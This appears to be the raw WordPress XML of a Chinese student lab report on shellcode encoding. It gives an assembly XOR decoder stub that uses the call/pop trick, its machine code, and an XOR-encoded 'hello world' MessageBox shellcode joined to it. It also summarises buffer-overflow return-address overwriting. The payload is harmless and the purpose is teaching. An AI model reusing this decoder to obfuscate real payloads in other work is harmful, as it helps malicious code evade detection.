        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minor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可以看到编码程序顺利执行，可以生成encode.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3442970"/>
            <wp:effectExtent l="0" t="0" r="127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08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编码后的shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="974725"/>
            <wp:effectExtent l="0" t="0" r="2540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08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解码程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EAX在shellcode开始时对准shellcode起始位置，之后的代码将每次将shellcode的代码异或特定key后重新覆盖原先shellcode的代码。末尾，放一个空指令0x90作为结束符。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408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问题在于，如何让eax开始对准shellcode的起始位置?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>all lable; lable: pop eax;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>通过下面的程序来产生含有解码程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr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>#include &lt;stdlib.h&gt;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>#include &lt;string.h&gt;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>#include &lt;stdio.h&gt;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>int main()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__asm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 xml:space="preserve">    {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call lable; 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 xml:space="preserve">     lable: pop eax; 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add e</w:t>
            </w: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x, 0x1</w:t>
            </w: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 xml:space="preserve">            ;越过decoder记录shellcode起始地址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 xml:space="preserve">        xor ecx, ecx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 xml:space="preserve">    decode_loop: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 xml:space="preserve">        mov bl, [eax + ecx]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xor bl, 0x44             ;用0x44作为key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 xml:space="preserve">        mov [eax + ecx], bl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 xml:space="preserve">        inc ecx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  cmp bl, 0x90             ;末尾放一个0x90作为结束符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 xml:space="preserve">        jne decode_loop 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return 0;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="408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>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408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提取机器码为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"\xE8\x00\x00\x00\x00\x58\x83\xC0\x15\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1C\x08\x41\x80\xFB\x90\x75\xF1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408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调用Messagebox输出“hello world”的Shellcode的编码为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"\x77\x9f\x17\x2c\x36\x28\x20\x64\x2c\x2b\x64\x33\x2b\x2c\x2c\x21\x28\x28\xcf\x80\x17\x14\x14\x17\xfc\xae\x43\x91\x33\xbb\x94\xd4"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>链接两</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>机器码后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>得到完整shellcode如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"\xE8\x00\x00\x00\x00\x58\x83\xC0\x15\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1C\x08\x41\x80\xFB\x90\x75\xF1\x77\x9f\x17\x2c\x36\x28\x20\x64\x2c\x2b\x64\x33\x2b\x2c\x2c\x21\x28\x28\xcf\x80\x17\x14\x14\x17\xfc\xae\x43\x91\x33\xbb\x94\xd4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408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最后的运行截图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000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通过本次实验，掌握了：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"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shellcode编码的原理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利用缓冲区溢出，通过文本植入二进制代码，将返回地址修改为跳转到shellcode执行的地方，从而达到预期的效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"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shellcode提取的思想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可以先写C语言代码，通过调试找到对应的汇编代码，并进行一定的修改，然后在memory中找到对应的机器语言代码，就是所要的shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="407" w:firstLineChars="194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还可以对shellcode进行一定的加壳处理，常见的比如异或编码，需要将解码程序也加入到shellcode中，问题在于如何定位shellcode开始的代码，可以采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>all lable; lable: pop eax;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的方式解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="407" w:firstLineChars="194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shellcode编写与利用需要软件安全从业者重复掌握调试技巧、计算指令空间大小、精确覆盖返回地址等，有一定难度。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E3E93F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F9E3E9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A04064D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7A04064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1BA03F4E"/>
    <w:rsid w:val="21702961"/>
    <w:rsid w:val="3F4F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702</Words>
  <Characters>1120</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1208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Jan</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-06T10:41:48Z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FCAB1019327341E4AF601FAA087D135C</vt:lpwstr>
  </property>
</Properties>
</file>